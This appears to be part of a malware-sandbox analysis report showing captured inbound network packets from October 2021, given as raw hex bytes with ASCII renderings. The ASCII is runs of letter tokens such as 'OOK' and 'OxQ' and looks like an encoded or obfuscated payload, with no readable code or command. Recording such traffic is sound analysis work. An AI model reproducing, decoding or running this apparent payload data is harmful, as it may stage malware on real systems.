52 20 51 59 20 51 51 20 59 59 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 74 78 20 74 74 20 59 6f 20 51 59 20 51 52 20 59 59 20 6b 4b 20 4f 6f 78 20 4f 6f 52 20 4f 78 Data Ascii: Kt OOK OOt OxQ kk OoR KQ Yx Rx Ko ko OOR OxQ OOR oE oQ Et OR Ko Oxk OOR OxQ OOR oxK YK Ok Yo kK OOR R Eo OOE Yx Yk oE Oko OOR OOY OOt OxY kk oE Kk Yx oQ OoK kK OOt OxQ QO QE Oot YO YK QK oQ Et Oxk OOo YR QY QQ YY kK Oox Oot tx tt Yo QY QR YY kK Oox OoR Ox
2021-10-29 18:50:16 UTC	1753	IN	Data Raw: 20 4f 6f 4b 20 4f 4f 52 20 45 59 20 59 4b 20 45 6b 20 6b 51 20 4f 6b 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 6b 4f 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 51 45 20 4f 52 51 20 59 4f 20 59 4b 20 6b 6f 20 51 51 20 4f 4f 45 20 6f 20 6f 45 6f 20 59 4f 20 4b 6b 20 59 6f 20 6f 52 20 74 6b 20 51 51 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 52 20 51 45 20 4f 52 6b 20 59 4f 20 59 4b 20 6b 6f 20 51 78 20 4f 4f 20 4f 78 6b 20 4f 4f 6f 20 59 52 20 51 59 20 74 74 20 59 59 20 6b 4b 20 4f 6f 78 20 6f 52 20 6f 59 78 20 4f 4f 45 20 59 78 20 59 4b 20 6f 59 20 59 6b 20 52 51 20 4f 4f 6b 20 74 20 4f 4f 6b 20 4f 6f 74 20 59 78 20 52 4b 20 51 45 20 4f 52 4f 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 4f 78 74 20 51 74 20 59 4b 20 Data Ascii: OoK OOR EY YK Ek kQ OkY OOK OOt OxE EO OkO Kk Yx Rx OoK OkK OOt OxQ OOk QE ORQ YO YK ko QQ OOE o oEo YO Kk Yo oR tk QQ OOE OoK OOR QE ORk YO YK ko Qx OO Oxk OOo YR QY tt YY kK Oox oR oYx OOE Yx YK oY Yk RQ OOk t OOk Oot Yx RK QE ORO kY OOK OOY Oxt Qt YK
2021-10-29 18:50:16 UTC	1757	IN	Data Raw: 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 4f 78 51 20 4f 6f 45 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f 20 4f 74 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 74 20 59 78 20 59 4b 20 51 4b 20 4f 20 74 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 45 20 59 6b 20 45 78 20 4f 6f 74 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 20 74 59 20 4b 51 20 59 78 20 52 78 20 74 4f 20 4f 6f 45 20 4f 78 78 20 4f 78 78 20 45 4f 20 52 59 20 4b 51 20 59 78 20 52 78 20 74 4f 20 4f 6f 78 20 4f 78 78 20 4f 78 45 20 45 4f 20 74 78 20 4b 51 20 59 78 20 52 78 20 74 4f 20 4f 4f 52 20 51 4b 20 4f 59 20 51 74 20 59 6f 20 51 59 20 74 4f 20 59 59 20 6b 4b 20 4f 6f 78 20 4f 78 6f 20 Data Ascii: Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK OxQ OoE ooK Ko Yx Kk YO OQ OEo OtQ OOt OxQ OOR oR t Yx YK QK O tt OxQ OOo YR EE Yk Ex Oot OOK OOt OxE E tY KQ Yx Rx tO OoE Oxx Oxx EO RY KQ Yx Rx tO Oox Oxx OxE EO tx KQ Yx Rx tO OOR QK OY Qt Yo QY tO YY kK Oox Oxo
2021-10-29 18:50:16 UTC	1761	IN	Data Raw: 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 78 20 59 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 78 20 4b 6b 20 59 78 20 6f 6b 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 51 45 20 4f 4f 45 20 59 78 20 4b 6b 20 4b 51 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 45 20 6f 20 59 45 20 6b 4b 20 4b 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 51 51 20 4b 6b 20 59 78 20 45 51 20 45 51 20 6f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 59 52 20 6f 4b 20 4f 6b 78 20 59 59 20 6b 4b 20 4f 6f 78 20 51 45 20 52 51 20 4f 4f 6f 20 59 78 20 6f 74 20 74 52 20 6f 4f 20 6b 59 20 4f Data Ascii: oK YK kK OOK OKE OxQ OOo Yx ox YO YK kK Oox OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOk Yx Kk Yx ok kY OOK OOt QE OOE Yx Kk KQ YK kK OOK Oot OxQ OOo YO KE o YE kK KQ OOt OxQ OOo QQ Kk Yx EQ EQ oOE OOt OxQ Ooo YR oK Okx YY kK Oox QE RQ OOo Yx ot tR oO kY O
2021-10-29 18:50:16 UTC	1766	IN	Data Raw: 4f 4f 6b 20 52 4b 20 59 59 20 4b 6b 20 4f 6f 59 20 59 4b 20 6b 4b 20 4f 4f 4b 20 45 6f 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 45 74 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 52 20 4b 74 20 4f 4f 78 20 4f 74 4f 20 52 74 20 6f 51 20 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 6b 20 59 6f 20 4b 6b 20 6f 4f 6b 20 6f 74 20 4f 78 51 20 59 6f 20 6f 45 4b 20 4b 59 20 59 74 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 51 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6b 20 59 52 20 4b 6b 20 6b 6f 20 6f 59 6f 20 6f 6b 20 4f 6f 6f 20 4b 4f 20 4f 52 6b 20 Data Ascii: OOk RK YY Kk OoY YK kK OOK Eo OxQ OOo EY Yx Et Okt OK OOK OOt Oxk kY ER Kt OOx OtO Rt oQ Ok OxQ OOo YR Yk Yo Kk oOk ot OxQ Yo oEK KY Yt OQO Oxk kK OOK OOR to ORx OQY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ kx OxQ OOo YR ok YR Kk ko oYo ok Ooo KO ORk
2021-10-29 18:50:16 UTC	1770	IN	Data Raw: 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 78 20 74 45 20 4f 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 4f 51 20 4b 20 59 78 20 4b 6b 20 59 52 20 45 78 20 4f 51 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 45 20 51 6f 20 59 74 20 59 78 20 74 45 20 4f 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 6f 20 59 78 20 4b 6b 20 59 52 20 59 6f 20 4b 74 20 59 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 74 52 20 52 6b 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 45 78 20 4f 78 6b 20 4f 4f 6f 20 59 52 20 6f 6b 20 59 74 20 59 6f 20 4b 74 20 59 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 52 52 20 59 78 20 59 4b 20 51 4b 20 4f 4f 6f 20 4f 4b 20 4b 78 20 4f 4f 6f 20 59 78 20 59 6f 20 74 52 20 52 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 6f 6f 74 20 59 4f Data Ascii: OK OOt OxQ OOo Yx Yx tE OOt kK OOK OOE OQ K Yx Kk YR Ex OQQ OOY OOt OxE Qo Yt Yx tE OOt kK OOK OOE RQ o Yx Kk YR Yo Kt YE OOt OxQ OOR tR Rk Yx YK QK Qx oEx Oxk OOo YR ok Yt Yo Kt YE OOt OxQ OOR oR RR Yx YK QK OOo OK Kx OOo Yx Yo tR RR kK OOK Oot RQ oot YO
2021-10-29 18:50:16 UTC	1774	IN	Data Raw: 6f 6b 20 74 4b 20 4f 4f 6f 20 4f 4b 20 6f 59 4b 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 4b 20 6f 78 20 6b 52 20 4f 4f 45 20 6b 20 6f 59 4b 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 4b 20 4b 78 20 6b 52 20 51 20 6f 6f 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4f 52 20 59 6f 20 6b 74 20 4f 59 20 6f 6f 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4b 4b 20 59 6f 20 4b 74 20 6f 45 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4f 6b 20 4b 6b 20 59 45 20 4b 4f 20 6f 45 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4b 52 20 4b 6b 20 74 74 20 4f 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4f 52 20 59 78 20 4b 51 20 74 59 20 4f 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4b 4b 20 59 78 20 74 45 20 4f 52 4f 20 6b 4b 20 4f 4f 4b 20 4f 4f Data Ascii: ok tK OOo OK oYK OOo Yx Yo oK ox kR OOE k oYK OOo Yx Yo oK Kx kR Q ooY OxQ OOo YK oR OR Yo kt OY ooY OxQ OOo YK oR KK Yo Kt oEO OOt OxQ OOR oK Ok Kk YE KO oEO OOt OxQ OOR oK KR Kk tt OQK OOK OOt OxY Qx OR Yx KQ tY OQK OOK OOt OxY Qx KK Yx tE ORO kK OOK OO
2021-10-29 18:50:16 UTC	1778	IN	Data Raw: 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 51 51 20 4f 4f 4b 20 74 4b 20 4f 74 59 20 51 59 20 6f 45 52 20 59 4b 20 6b 4b 20 4f 6f 78 20 51 6b 20 6f 4b 74 20 6f 20 4f 4b 4f 20 45 52 20 59 78 20 74 78 20 4f 6f 4b 20 4b 74 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 4b 20 45 51 20 6f 4b 20 59 4b 20 6b 4b 20 51 74 20 52 51 20 4f 4f 4f 20 4f 4f 6f 20 4f 6f 74 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 59 20 51 45 20 4f 4b 6b 20 59 4f 20 59 4b 20 51 4b 20 4f 78 4f 20 74 78 20 4b 74 20 4f 4f 59 20 45 52 20 51 59 20 4f 59 4f 20 59 59 20 6b 4b 20 4f 6f 78 20 6b 51 20 6b 4b 20 4f 4f 59 20 51 45 20 4f 6f 74 20 59 4f 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 4f 20 4f 78 6b 20 4f 4f 6f 20 59 52 20 51 59 20 4f 4b 51 20 Data Ascii: OQO OxR Yx YK kY kt QQ OOK tK OtY QY oER YK kK Oox Qk oKt o OKO ER Yx tx OoK Kt OOt OxQ Ooo oK EQ oK YK kK Qt RQ OOO OOo Oot Kk Yx YK kK OOK OOt OxQ OOY QE OKk YO YK QK OxO tx Kt OOY ER QY OYO YY kK Oox kQ kK OOY QE Oot YO YK QK oQ oOO Oxk OOo YR QY OKQ
2021-10-29 18:50:16 UTC	1781	IN	Data Raw: 4f 45 45 20 4f 4f 52 20 4f 4f 6b 20 59 78 20 4f 4f 20 45 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 45 74 20 74 59 20 4f 4b 51 20 59 20 59 6f 20 59 4b 20 6b 59 20 4b 6b 20 45 78 20 52 59 20 4f 4f 6b 20 59 78 20 4f 59 6b 20 4f 6b 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 6f 78 52 20 6b 51 20 4f 51 4b 20 4b 4f 20 59 6f 20 59 4b 20 6b 4b 20 6b 45 20 4f 45 45 20 4f 4f 52 20 4f 4f 6b 20 59 78 20 45 74 20 4f 4f 4b 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 6f 78 6f 20 74 4b 20 6b 51 20 6f 6b 20 59 6f 20 59 4b 20 6f 6f 6f 20 74 52 20 45 78 20 52 59 20 6f 59 4f 20 59 4f 20 4f 78 4f 20 78 20 59 4b 20 6b 4b 20 4f 6f 4b 20 4f 4f 74 20 6f 4b 78 20 52 59 20 6f 45 74 20 6f 74 20 52 78 20 59 4b 20 52 20 74 52 20 4f 74 78 20 74 78 20 4f 6f 52 20 59 78 20 Data Ascii: OEE OOR OOk Yx OO E QE Oox OOR OOt Et tY OKQ Y Yo YK kY Kk Ex RY OOk Yx OYk Ok QE Oox OOR OOt oxR kQ OQK KO Yo YK kK kE OEE OOR OOk Yx Et OOK QE Oox OOR OOt oxo tK kQ ok Yo YK ooo tR Ex RY oYO YO OxO x YK kK OoK OOt oKx RY oEt ot Rx YK R tR Otx tx OoR Yx
2021-10-29 18:50:16 UTC	1785	IN	Data Raw: 6b 20 4f 6f 4f 20 59 4f 20 45 6f 20 59 78 20 4f 59 51 20 74 45 20 4f 4f 4b 20 4f 4f 74 20 59 6f 20 4f 4f 45 20 6f 6f 20 4b 6b 20 4b 78 20 59 59 20 51 45 20 4f 4f 59 20 4f 78 4f 20 4f 78 51 20 6f 78 45 20 4f 4f 45 20 4b 6b 20 59 78 20 4f 4f 4f 20 6b 59 20 6b 4b 20 4f 4f 74 20 4f 4f 51 20 4f 4f 45 20 59 51 20 4b 51 20 45 4b 20 59 4b 20 6f 6f 6b 20 4b 51 20 4f 4f 74 20 4f 78 51 20 4b 4f 20 59 4f 20 6f 59 20 59 78 20 4b 4b 20 6b 59 20 4f 4f 59 20 4f 4f 74 20 4f 6f 59 20 4f 4f 6f 20 6b 4b 20 45 45 20 59 78 20 59 4b 20 4f 6f 59 20 4f 4f 4b 20 51 59 20 4f 78 51 20 4f 78 52 20 59 4f 20 4b 51 20 59 78 20 45 6b 20 6b 4b 20 4f 74 4f 20 4f 78 78 20 4f 78 51 20 4f 4f 6f 20 6f 74 20 4b 6b 20 45 78 20 59 4b 20 74 59 20 4f 4f 59 20 4f 4f 52 20 4f 78 51 20 51 52 20 59 78 Data Ascii: k OoO YO Eo Yx OYQ tE OOK OOt Yo OOE oo Kk Kx YY QE OOY OxO OxQ oxE OOE Kk Yx OOO kY kK OOt OOQ OOE YQ KQ EK YK ook KQ OOt OxQ KO YO oY Yx KK kY OOY OOt OoY OOo kK EE Yx YK OoY OOK QY OxQ OxR YO KQ Yx Ek kK OtO Oxx OxQ OOo ot Kk Ex YK tY OOY OOR OxQ QR Yx
2021-10-29 18:50:16 UTC	1789	IN	Data Raw: 45 6b 20 4f 4f 52 20 4f 4f 52 20 4f 6f 4b 20 45 6b 20 4f 74 6b 20 6f 4b 4f 20 59 6b 20 59 59 20 52 51 20 45 52 20 6f 4b 59 20 45 74 20 4f 6f 45 20 59 4f 20 45 45 20 59 4f 20 59 4b 20 78 20 4f 4f 78 20 6f 4f 4f 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 59 6f 20 4b 4f 20 4f 4b 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 51 78 20 4f 78 74 20 4f 4b 6b 20 4b 6b 20 59 4f 20 59 4b 20 4f 74 78 20 4f 78 59 20 4f 4f 59 20 4f 6f 4b 20 4f 4f 45 20 59 78 20 6f 6f 74 20 4b 52 20 4f 4b 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 51 74 20 4f 78 74 20 4f 4b 6b 20 4b 6b 20 59 4f 20 59 4b 20 4f 45 59 20 4f 78 59 20 6f 4f 4f 20 4f 78 51 20 4f 4f 45 20 59 78 20 6f 78 52 20 4b 4f 20 52 45 20 52 51 20 4f 4f 52 20 4f 4f 74 20 4f 6b 45 20 6b 74 20 45 45 20 45 45 20 59 6f 20 59 4b 20 74 Data Ascii: Ek OOR OOR OoK Ek Otk oKO Yk YY RQ ER oKY Et OoE YO EE YO YK x OOx oOO OxQ OOE Yx OYo KO OKK kK OOY OOt OQx Oxt OKk Kk YO YK Otx OxY OOY OoK OOE Yx oot KR OKK kK OOY OOt OQt Oxt OKk Kk YO YK OEY OxY oOO OxQ OOE Yx oxR KO RE RQ OOR OOt OkE kt EE EE Yo YK t
2021-10-29 18:50:16 UTC	1793	IN	Data Raw: 45 51 20 52 4f 20 74 78 20 52 59 20 4f 4f 52 20 52 51 20 51 51 20 4f 45 4f 20 45 45 20 4f 20 59 59 20 6f 6b 20 4f 6f 6f 20 4f 51 52 20 4f 6f 4b 20 52 74 20 59 4f 20 4f 74 6b 20 45 74 20 45 74 20 52 51 20 52 59 20 4f 4f 52 20 52 51 20 4f 4f 6b 20 4f 45 4f 20 45 45 20 4f 20 59 59 20 4b 4b 20 4f 78 52 20 4f 59 78 20 4f 6f 4b 20 52 74 20 59 4f 20 59 45 20 52 4f 20 4f 74 6b 20 52 51 20 52 59 20 4f 4f 52 20 4f 51 51 20 51 52 20 4f 74 59 20 45 45 20 4f 20 59 59 20 4f 52 4f 20 51 74 20 4f 78 4f 20 4f 6f 74 20 52 74 20 59 4f 20 51 6b 20 52 45 20 45 59 20 74 78 20 52 59 20 4f 4f 52 20 6f 6f 59 20 4f 78 6f 20 6f 45 59 20 45 45 20 4f 20 59 59 20 59 20 51 74 20 4f 74 6f 20 4f 6f 4b 20 52 74 20 59 4f 20 6f 6f 6b 20 45 74 20 45 74 20 52 51 20 52 59 20 4f 4f 52 20 6f 59 Data Ascii: EQ RO tx RY OOR RQ QQ OEO EE O YY ok Ooo OQR OoK Rt YO Otk Et Et RQ RY OOR RQ OOk OEO EE O YY KK OxR OYx OoK Rt YO YE RO Otk RQ RY OOR OQQ QR OtY EE O YY ORO Qt OxO Oot Rt YO Qk RE EY tx RY OOR ooY Oxo oEY EE O YY Y Qt Oto OoK Rt YO ook Et Et RQ RY OOR oY
2021-10-29 18:50:16 UTC	1798	IN	Data Raw: 74 4f 20 6f 4b 59 20 4f 6f 4f 20 6f 78 20 59 78 20 59 52 20 4f 4f 45 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 4f 6f 20 6b 78 20 4b 4f 20 4f 6b 59 20 45 4b 20 4b 51 20 4f 4f 4b 20 74 45 20 4b 52 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 6b 4b 20 45 20 4f 78 6b 20 45 78 20 4f 78 78 20 6b 4b 20 4b 6b 20 52 52 20 4f 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 52 20 59 78 20 4f 6b 51 20 59 20 4f 6b 6f 20 52 4b 20 6f 4f 20 4f 4f 74 20 6f 78 4f 20 59 4f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 4f 4b 20 6f 4b 59 20 4f 4f 52 20 45 20 45 6b 20 6b 6b 20 59 78 20 6f 45 6b 20 6f 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 4b 6b 20 6f 6f 6b 20 78 20 45 51 20 4f 78 6f 20 6f 6b 20 4f 78 51 Data Ascii: tO oKY OoO ox Yx YR OOE YK kK OOK OOt oEY OOo kx KO OkY EK KQ OOK tE KR OOo Yx Kk Yx OtR kK E Oxk Ex Oxx kK Kk RR OOt kK OOK OOt OxQ oKR Yx OkQ Y Oko RK oO OOt oxO YO Yx Kk Yx YK oOx OOK oKY OOR E Ek kk Yx oEk oE OOK OOt OxQ OOo Okx Kk ook x EQ Oxo ok OxQ
2021-10-29 18:50:16 UTC	1802	IN	Data Raw: 74 6f 20 6b 59 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 4f 74 20 4f 52 74 20 74 74 20 4f 52 4b 20 45 74 20 4f 6b 20 59 59 20 4f 59 74 20 6f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 4b 6f 20 4f 6b 4b 20 51 52 20 4f 4f 59 20 4f 4f 74 20 74 52 20 4f 4f 45 20 6f 45 78 20 6b 74 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 74 51 20 4f 78 51 20 4f 51 20 78 20 4f 74 74 20 45 51 20 6f 45 20 6b 59 20 4b 6f 20 6f 51 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 6f 4b 4b 20 59 4b 20 6f 45 52 20 74 4b 20 6f 59 4b 20 4f 6f 78 20 6b 45 20 59 4f 20 51 6f 20 6b 51 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 6f 78 20 6f 45 78 20 6b 20 4f 74 45 20 45 59 20 4f 4f 51 20 4f 4f 59 20 4f 20 52 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 Data Ascii: to kY Kk Yx YK kK oKK OOt ORt tt ORK Et Ok YY OYt oO OOt OxQ OOo Yx Oko Ko OkK QR OOY OOt tR OOE oEx kt Yx YK kK OOK OtQ OxQ OQ x Ott EQ oE kY Ko oQ OxQ OOo Yx Kk oKK YK oER tK oYK Oox kE YO Qo kQ YK kK OOK OOt oEY Oox oEx k OtE EY OOQ OOY O R OOo Yx Kk Y
2021-10-29 18:50:16 UTC	1806	IN	Data Raw: 74 20 4f 78 51 20 6f 45 78 20 59 78 20 4f 74 59 20 4f 51 20 6f 74 20 6b 74 20 6f 4f 20 4f 4f 52 20 4f 6b 4f 20 6f 78 6b 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 78 52 20 6f 59 4f 20 6b 51 20 4f 4f 45 20 59 78 20 6b 6b 20 59 4f 20 6f 4f 4b 20 6f 4b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 59 52 20 6f 45 59 20 59 6b 20 4f 59 74 20 4f 4f 4b 20 6f 51 20 4f 78 6b 20 4f 59 6f 20 4f 4b 52 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 6f 59 20 4f 4b 78 20 4f 6f 4b 20 45 4b 20 4b 6b 20 51 78 20 59 59 20 4f 52 59 20 6f 4f 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 4f 45 20 6b 78 20 4f 6b 74 20 4f 4f 74 20 4b 20 4f 4f 45 20 6f 78 45 20 4f 4b 4b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f Data Ascii: t OxQ oEx Yx OtY OQ ot kt oO OOR OkO oxk Yx Kk Yx YK oOx OxR oYO kQ OOE Yx kk YO oOK oKK OOK OOt OxQ OOo Okx YR oEY Yk OYt OOK oQ Oxk OYo OKR Kk Yx YK kK oKK OoY OKx OoK EK Kk Qx YY ORY oOx OOt OxQ OOo Yx Oko Yk OOE kx Okt OOt K OOE oxE OKK Yx YK kK OOK o
2021-10-29 18:50:16 UTC	1810	IN	Data Raw: 20 51 6f 20 6f 4b 78 20 4f 4f 45 20 6f 4b 4b 20 4f 4f 45 20 74 20 4f 4b 74 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78 4f 20 6f 78 59 20 59 6b 20 59 45 20 59 78 20 4f 74 59 20 6b 59 20 74 52 20 6f 4f 4b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 78 20 52 6f 20 4f 78 4b 20 4f 6f 4f 20 4f 6b 6b 20 4f 78 51 20 6f 45 4b 20 59 4f 20 4f 4f 6b 20 4f 4b 59 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 6f 78 20 4f 4f 6b 20 59 51 20 45 4b 20 59 4b 20 6f 78 52 20 4f 4f 59 20 59 6b 20 6f 78 52 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 74 52 20 6f 59 6f 20 52 59 20 4f 78 6b 20 4f 4f 6f 20 4f 52 51 20 4b 51 20 4f 78 4f 20 4f 4b 51 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 52 20 59 6b 20 4f 4f 51 20 59 4b 20 Data Ascii: Qo oKx OOE oKK OOE t OKt Yx YK kK OOK oKE OxO oxY Yk YE Yx OtY kY tR oOK OxQ OOo Yx Kk Okx Ro OxK OoO Okk OxQ oEK YO OOk OKY YK kK OOK OOt oEY Oox OOk YQ EK YK oxR OOY Yk oxR OOo Yx Kk Yx OtR tR oYo RY Oxk OOo ORQ KQ OxO OKQ kK OOK OOt OxQ oKR Yk OOQ YK
2021-10-29 18:50:16 UTC	1813	IN	Data Raw: 51 6b 20 6f 4f 59 20 4f 4f 45 20 4f 45 45 20 4f 59 78 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78 4f 20 4f 78 52 20 4b 51 20 74 6b 20 45 74 20 4f 4b 4f 20 6b 59 20 6f 78 59 20 6f 4f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 78 20 52 6f 20 4f 4f 51 20 4f 4f 45 20 6f 59 45 20 4f 6f 6f 20 6f 78 45 20 59 4f 20 6f 4b 6b 20 4f 4b 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 6f 78 20 6f 59 78 20 59 6f 20 4f 78 6f 20 45 45 20 6f 45 6f 20 4f 4f 59 20 4f 52 59 20 6f 78 45 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 51 6f 20 4f 52 45 20 4f 4f 45 20 59 4f 20 4f 78 45 20 4f 4b 6f 20 4b 51 20 6f 45 59 20 4f 4b 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 52 20 59 6b 20 6f 6b 20 59 45 20 74 6f 20 52 74 Data Ascii: Qk oOY OOE OEE OYx Yx YK kK OOK oKE OxO OxR KQ tk Et OKO kY oxY oOO OxQ OOo Yx Kk Okx Ro OOQ OOE oYE Ooo oxE YO oKk OKk YK kK OOK OOt oEY Oox oYx Yo Oxo EE oEo OOY ORY oxE OOo Yx Kk Yx OtR Qo ORE OOE YO OxE OKo KQ oEY OKK kK OOK OOt OxQ oKR Yk ok YE to Rt
2021-10-29 18:50:16 UTC	1817	IN	Data Raw: 6b 6f 20 4f 4f 59 20 6b 4b 20 4f 51 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 74 52 20 6f 59 6f 20 52 59 20 4f 78 6b 20 4f 4f 6f 20 6f 78 6b 20 4b 51 20 6f 74 20 4f 59 52 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 45 20 59 78 20 4f 45 78 20 4b 51 20 51 6b 20 52 74 20 4f 4b 4b 20 4f 4f 52 20 51 4f 20 6f 4f 6b 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 59 20 4f 4f 4b 20 6f 45 51 20 4f 78 4f 20 4f 6b 51 20 45 74 20 6f 4f 78 20 59 4f 20 4f 4f 74 20 6f 59 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 74 74 20 4b 6b 20 4f 4b 6f 20 59 6b 20 4f 45 4f 20 4f 78 4f 20 4f 59 4f 20 4f 78 6b 20 45 6f 20 4f 59 6f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4f 20 4f 4f 74 20 52 74 20 4f 6f 74 20 6f 4f 4f 20 45 51 20 6f 78 6b 20 59 Data Ascii: ko OOY kK OQQ OOo Yx Kk Yx OtR tR oYo RY Oxk OOo oxk KQ ot OYR kK OOK OOt OxQ oKE Yx OEx KQ Qk Rt OKK OOR QO oOk Yx Kk Yx YK oOY OOK oEQ OxO OkQ Et oOx YO OOt oYK OOK OOt OxQ OOo Ott Kk OKo Yk OEO OxO OYO Oxk Eo OYo Kk Yx YK kK oKO OOt Rt Oot oOO EQ oxk Y
